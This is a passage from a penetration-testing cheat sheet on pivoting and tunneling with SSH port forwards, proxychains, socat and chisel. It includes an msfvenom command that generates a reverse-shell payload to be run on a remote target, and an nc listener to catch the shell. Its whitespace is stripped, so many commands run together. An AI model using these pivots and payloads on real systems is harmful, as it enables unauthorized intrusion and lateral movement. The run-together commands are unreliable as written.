Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
SSH Tunneling 101
# SSH local port forward to reach an_internal_server_ip:port via server_ipsshtunneler@server_ip-p2222-L1234:an_internal_server_ip:80# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ipsshtunneler@server_ip-p2222-D1080# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only# ProxyJump ssh to an_internal_host via ssh server_ipssh-Jtunneler@server_ip:2222whistler@an_internal_host# which is only accessible from server_ip# SSH remote port forward to send traffic back to our local port from a port of server_ipsshwhistler@server_ip-p2222-L58671:localhost:1234# # this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_boxssh-jfirstuser@1st_box:2222seconduser@2nd_box-D1080# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only# bypass first time prompt when have non-interactive shellssh-o"UserKnownHostsFile=/dev/null"-o"StrictHostKeyChecking=no"
-R8081:172.24.0.2:80# (on my Kali machine listen on 8081, get it from 172.24.0.2:80)# <KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80# Now you can access 172.24.0.2:80, which you didn't have direct access to-L8083:127.0.0.1:8084# (on your machine listen on 8083, send it to my Kali machine on 8084)# <KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX# run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get itForreverseshell:msfvenom-plinux/x86/shell_reverse_tcpLHOST=10.1.1.230LPORT=8083-fexe-oshellRuniton2ndremotetargettogetashellonKali
If you didn't have an SSH session
First, SSH to your Kali from target machine
On Kali:
servicesshstart# "add a user, give it /bin/false in /etc/passwd"ssh--R12345:192.168.122.228:5986test@10.1.1.1
Port Forwarding (Single port to one port)
Using Socat
For linux
Forward your 8083 to 10.39.0.2:443
./socatTCP4-LISTEN:8083,forkTCP4:10.39.0.2:443
Using Chisel
Most platforms
Remote static tunnels "port to port":
#On Kali "reverse proxy listener":./chiselserver-p8000-reverse#General command:./chiselclient $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT
Remote tunnels "access IP:PORT you couldn't access before":